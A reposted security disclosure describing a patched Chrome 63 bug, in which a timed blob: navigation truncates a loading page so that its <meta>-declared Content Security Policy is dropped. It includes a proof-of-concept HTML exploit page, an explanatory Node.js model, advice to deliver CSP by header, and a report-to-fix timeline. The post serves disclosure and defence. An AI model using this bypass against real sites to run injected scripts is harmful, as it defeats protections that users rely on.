Bypassing CSP in Chrome 63.0
Reposted from: n0tr00t
0x01 TL;DR
I noticed that when a try/catch inside a timer uses location to navigate a window to a blob: scheme, loading of that window's network requests is randomly cut off: the page finishes loading, but part of its content is missing, and, interestingly, the missing content runs from the top downward. This defect suggested an attack: let the cut preferentially eat the CSP policy declared in the <head>, so that the declared policy stops applying entirely and injected content executes as if no policy had been set.
For example:
<cut>
content...
<meta http-equiv="Content-Security-Policy" content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:">
</cut>
content...
here injection
Truncation demonstrated on Google or Bing:
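As an added illustration, not code from the original post: a small Node.js model of why a policy declared only in a <meta> element is lost when the head is cut, while the same policy sent in the Content-Security-Policy response header is not. The victim document, the cut offsets and the response objects are constructed for this example; it assumes header policies are applied before any body byte is parsed (which is how CSP headers are delivered in general, not something the post tests), and it approximates the HTML parser with a regular expression rather than reproducing Chrome's behaviour.

```javascript
'use strict';

// Parse a CSP policy string into a Map: directive name -> array of source expressions.
// A directive repeated within one policy is ignored after its first occurrence,
// matching how browsers treat duplicates.
function parseCsp(policy) {
  const directives = new Map();
  for (const raw of policy.split(';')) {
    const tokens = raw.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Model of the truncation: the bytes in [cut.start, cut.end) never reach the
// parser. cut === null means the document arrived intact.
function deliveredHtml(html, cut) {
  if (cut === null) return html;
  return html.slice(0, cut.start) + html.slice(cut.end);
}

// Policies from <meta http-equiv="Content-Security-Policy"> elements that survive
// intact. A tag whose leading "<meta" is gone is just text to the HTML parser,
// which is why the cut removes the policy instead of merely corrupting it.
// (Regex approximation of the tokenizer, not Chrome's parser.)
function metaPolicies(html) {
  const policies = [];
  const tagRe = /<meta\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    if (!/http-equiv\s*=\s*["']?content-security-policy["']?/i.test(attrs)) continue;
    const content =
      /\bcontent\s*=\s*"([^"]*)"/i.exec(attrs) || /\bcontent\s*=\s*'([^']*)'/i.exec(attrs);
    if (content) policies.push(content[1]);
  }
  return policies;
}

// Every policy the browser would enforce for this response: the header policy
// (assumed parsed before any body byte) plus whatever meta policies survived.
function effectivePolicies(response, cut) {
  const header = response.headers['content-security-policy'];
  const fromHeader = header ? [header] : [];
  const fromMeta = metaPolicies(deliveredHtml(response.body, cut));
  return { fromHeader, fromMeta, all: [...fromHeader, ...fromMeta].map(parseCsp) };
}

// True when at least one enforced policy forbids inline scripts: script-src
// (falling back to default-src) present without 'unsafe-inline'. Multiple
// policies combine restrictively, so one blocking policy is enough. Nonces and
// hashes are ignored, since an injected script carries neither.
function blocksInlineScript(policies) {
  return policies.some((p) => {
    const src = p.get('script-src') || p.get('default-src');
    return src !== undefined && !src.includes("'unsafe-inline'");
  });
}

// Constructed victim document (not the post's csptest.php): CSP in <head>,
// attacker-controlled injection further down, as in the post's <cut> sketch.
const VICTIM_BODY = [
  '<!doctype html><html><head>',
  '<meta http-equiv="Content-Security-Policy" content="script-src \'self\'; object-src \'none\'">',
  '<title>victim</title></head><body>',
  '<p>content...</p>',
  '<script>alert(document.domain)</script>', // the injection
  '</body></html>',
].join('\n');

const META_ONLY_RESPONSE = { headers: {}, body: VICTIM_BODY };
const HEADER_RESPONSE = {
  headers: { 'content-security-policy': "script-src 'self'; object-src 'none'" },
  body: VICTIM_BODY,
};

// A cut that starts at the top of the document and ends inside the meta tag,
// mirroring the top-down loss the post describes. Offsets are specific to VICTIM_BODY.
const CUT_THROUGH_META = { start: 0, end: 100 };

// Three deliveries of the same page; only the meta-only page loses its policy.
function demo() {
  return {
    intactMeta: blocksInlineScript(effectivePolicies(META_ONLY_RESPONSE, null).all),
    cutMeta: blocksInlineScript(effectivePolicies(META_ONLY_RESPONSE, CUT_THROUGH_META).all),
    cutWithHeader: blocksInlineScript(effectivePolicies(HEADER_RESPONSE, CUT_THROUGH_META).all),
  };
}

console.log(demo());
```

The practical takeaway is the third case: a <meta> policy is only as durable as the bytes of the document that carry it, so a site that can emit the header should put its policy there and treat the <meta> form as a fallback (it also cannot carry frame-ancestors, report-uri or sandbox).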
0x02 PoC
<html>
<!-- author: evi1m0.bat[at]gmail.com -->
<script>
pwn = () => {
  // Cross-origin victim page that carries its CSP in a <meta> tag;
  // the Date() query string defeats caching so every click is a fresh load.
  target = 'http://server.n0tr00t.com/chrome/csptest.php?p=' + Date();
  win = window.open(target, "emm", "width=500,height=400");
  // Every 1 ms: reading a cross-origin window's location.href throws a
  // SecurityError, so the catch branch runs while the victim is still loading
  // and navigates it to an invalid blob: URL. In Chrome 63 that cut part of
  // the in-flight document, taking the <meta> CSP with it.
  setInterval(`try{
    x = win.location.href;
  } catch(e) {
    win.location.href = 'blob://';
  }`, 1);
}
</script>
<p>
<a onclick="pwn()" target="_blank">Click me bypass CSP</a>
// If it doesn't work, try again. :)
</p>
</html>
0x03 Video
http://server.n0tr00t.com/chrome/cut_bypasscsp.mp4
0x04 Track
- Nov 9 2017: Reported by evi1m0.bat@gmail.com
- May 7 2018: Fixed in Chrome 66.0.3359.139
- https://bugs.chromium.org/p/chromium/issues/detail?id=783073#c_ts1525680141
Source: https://www.n0tr00t.com/2018/12/19/Chrome-63-0-CSP-Bypass.html